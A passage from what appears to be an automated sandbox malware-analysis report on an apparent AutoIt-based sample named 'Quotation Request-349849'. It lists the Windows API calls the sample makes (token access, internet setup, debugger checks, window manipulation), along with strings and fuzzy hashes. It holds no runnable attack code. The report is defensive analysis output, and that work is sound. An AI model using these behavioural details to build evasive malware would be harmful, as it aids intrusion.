                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0080BEA9
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0080BEC2
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0080BEE2
                                                      • ReleaseDC.USER32(?,00000000), ref: 0080BEED
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 0082871B
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,008282E6), ref: 00828722
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008282E6), ref: 0082872F
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,008282E6), ref: 00828736
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0082B4BE
                                                      Strings
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      APIs
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • __wcsnicmp.LIBCMT ref: 0083B02D
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0083B0F6
                                                      Strings
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 007E2968
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 007E2981
                                                      Strings
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      APIs
                                                        • Part of subcall function 007D4F0B: __fread_nolock.LIBCMT ref: 007D4F29
                                                      • _wcscmp.LIBCMT ref: 00839824
                                                      • _wcscmp.LIBCMT ref: 00839837
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      APIs
                                                      • _memset.LIBCMT ref: 0084259E
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008425D4
                                                      Strings
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00857B61
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00857B76
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00856B17
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00856B53
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832911
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0083294C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 9ab0c744507c5c337c6b57ea39f47c848333f0e2fbbf5e9e9d57f5ff315933d1
                                                      • Instruction ID: 8aa27fa84de744f5495f5fcbef574364d234282d6065a183e79192929c28633e
                                                      • Opcode Fuzzy Hash: 9ab0c744507c5c337c6b57ea39f47c848333f0e2fbbf5e9e9d57f5ff315933d1
                                                      • Instruction Fuzzy Hash: 2231BF31A00309EBEB25DE58C885FAEBFA8FF85350F180069ED85E62A1D7709944CB91
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00843A66
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 3506404897-2584243854
                                                      • Opcode ID: 239e0575c641926ccc7788cd6c8579cdd3d6f465d909556be14708254ec4f8eb
                                                      • Instruction ID: 8720b89d24187c8e6de7e2442d1cb77f7f2fea0ed64b0247576de452fbd95db0
                                                      • Opcode Fuzzy Hash: 239e0575c641926ccc7788cd6c8579cdd3d6f465d909556be14708254ec4f8eb
                                                      • Instruction Fuzzy Hash: 63217C3164022DEFCF14EF64CC86AAE77B9FB44700F500455E559EB282EB38AA45CB61
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00856761
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0085676C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: c6a25a60974c0cd44681a14dbba7a036484732f9412f692a8bef366103e8c861
                                                      • Instruction ID: fb856013e969510791fd405db34b8af9029c1711724e6039a3d31648df1013b4
                                                      • Opcode Fuzzy Hash: c6a25a60974c0cd44681a14dbba7a036484732f9412f692a8bef366103e8c861
                                                      • Instruction Fuzzy Hash: 6C118275300208BFEF259F54CC81EBB37AAFB983A9F504229FD14D7290E6759C6587A0
                                                      APIs
                                                        • Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
                                                        • Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
                                                        • Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91
                                                      • GetWindowRect.USER32(00000000,?), ref: 00856C71
                                                      • GetSysColor.USER32(00000012), ref: 00856C8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: d8246dbb91bbbbdee0154f1c73741d3a7ef7ad8971827d8b1af803223a16e660
                                                      • Instruction ID: e5ab29dfea66fc5764dbdcae7668326794e3639706b4256e7652032305bfcc4e
                                                      • Opcode Fuzzy Hash: d8246dbb91bbbbdee0154f1c73741d3a7ef7ad8971827d8b1af803223a16e660
                                                      • Instruction Fuzzy Hash: 28211472610209AFDF04DFA8CC45AEA7BA9FB08315F404629FE95D3251E635E864DB60
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 008569A2
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008569B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 4e0d3818f22ac51d4136c11feaaaa261d299aa9b2663ce7bc6970b83fe3a72bf
                                                      • Instruction ID: 2790c4996e525586f625c24aa3c85dde23d1c50c3f8952c577ddf374869b01fa
                                                      • Opcode Fuzzy Hash: 4e0d3818f22ac51d4136c11feaaaa261d299aa9b2663ce7bc6970b83fe3a72bf
                                                      • Instruction Fuzzy Hash: FC116D71100209ABEB108E74DC44AEB3BA9FB1537AF904724FEA5D71E0E735DC699760
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832A22
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00832A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 70f728bdff3df21c089a970d89d9c9901bb9211ab463cc0451e006e2137056b1
                                                      • Instruction ID: f24c4279e3a06065c27be168fabffd455def560a5d08816ab53ff0d3420152b4
                                                      • Opcode Fuzzy Hash: 70f728bdff3df21c089a970d89d9c9901bb9211ab463cc0451e006e2137056b1
                                                      • Instruction Fuzzy Hash: D3119332901138ABDB35EA9CDC44BAA77A9FB85314F244121E995E72A0D770AD0AC7D1
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0084222C
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00842255
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: aac7d949b73435f3cf808076e5e824a5ecce69b98d18d734cc29032f79afdd3d
                                                      • Instruction ID: 0057c83fd8b3bf3e335caf6eb58b399a84ff465c6e31d0e9e082dfc9440c9ea5
                                                      • Opcode Fuzzy Hash: aac7d949b73435f3cf808076e5e824a5ecce69b98d18d734cc29032f79afdd3d
                                                      • Instruction Fuzzy Hash: C211A070549239BADB258F518C84EBBFBA8FF1A755F50822AFA15D6100D2B06990D6F0
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00828E73
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: e695d50ce088988519a4a91dad7851c39daa4b8426fe8c1273c0998221824d1e
                                                      • Instruction ID: 7267e71ca6e2c454668fc94f67ebaaf78fe885a34d6e5f65c0198370e0273392
                                                      • Opcode Fuzzy Hash: e695d50ce088988519a4a91dad7851c39daa4b8426fe8c1273c0998221824d1e
                                                      • Instruction Fuzzy Hash: 9D019275602229EB8F18ABA4DC558FE7379FF05320B54061AB872A73E2EE355848C750
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 1e85de99b7ea8231b2449da8701c6a4a4717ab6e229518fb8ecfa44fbc56691c
                                                      • Instruction ID: 8bd3186716ef2870dcb57ce3e837453c647688825d3aac942657fc9265d33bcd
                                                      • Opcode Fuzzy Hash: 1e85de99b7ea8231b2449da8701c6a4a4717ab6e229518fb8ecfa44fbc56691c
                                                      • Instruction Fuzzy Hash: 1801F97180421CBEDB18DAA8CC1AEFE7BF8DB11301F00419AF652D2281E878E60487A0
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00828D6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: e601587803e6fcd1391ea2ecdbbb38ceef55f6bf0f943ddc104aea6398050f2e
                                                      • Instruction ID: a083956112956f1c4dd8968740dbeecde7c1cf0ed4e7e703c8df4b0b7a2f59fc
                                                      • Opcode Fuzzy Hash: e601587803e6fcd1391ea2ecdbbb38ceef55f6bf0f943ddc104aea6398050f2e
                                                      • Instruction Fuzzy Hash: 9501B171A41119EBDF18EBA4D956AFE73B8EF15300F10002AB802A3291EE285A0CD661
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00828DEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 7a22655fc4519e1c0c16d52c17657b7267e23f01b61b8f96a6fd76535f6b3e7f
                                                      • Instruction ID: 3a3daac5da530f8662e7da1cf2284863dbc628e98598f01e953a4e95b45bbe28
                                                      • Opcode Fuzzy Hash: 7a22655fc4519e1c0c16d52c17657b7267e23f01b61b8f96a6fd76535f6b3e7f
                                                      • Instruction Fuzzy Hash: 74018471A41119E7DF15E6A4D956AFE77A8EF11300F100016B846B32D2DA295E4CD271
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 7045b53dbad18cdaf8aff70fa765858bdb50ee62bd6fef25d31e71eda224ff5d
                                                      • Instruction ID: 3fba934fbfaa2ef16298a9f821594a396d794b0f9331db53323173c6f93fd94e
                                                      • Opcode Fuzzy Hash: 7045b53dbad18cdaf8aff70fa765858bdb50ee62bd6fef25d31e71eda224ff5d
                                                      • Instruction Fuzzy Hash: B7E0D13260432C67D710A795DC49FA7F7ACFB85B71F010067FD04D3151D9649A5587D0
                                                      APIs
                                                        • Part of subcall function 0080B314: _memset.LIBCMT ref: 0080B321
                                                        • Part of subcall function 007F0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0080B2F0,?,?,?,007D100A), ref: 007F0945
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,007D100A), ref: 0080B2F4
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007D100A), ref: 0080B303
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0080B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00811775
                                                        • Part of subcall function 0084BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0081195E,?), ref: 0084BFFE
                                                        • Part of subcall function 0084BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0084C010
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0081196D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008559AE
                                                      • PostMessageW.USER32(00000000), ref: 008559B5
                                                        • Part of subcall function 00835244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0085596E
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00855981
                                                        • Part of subcall function 00835244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461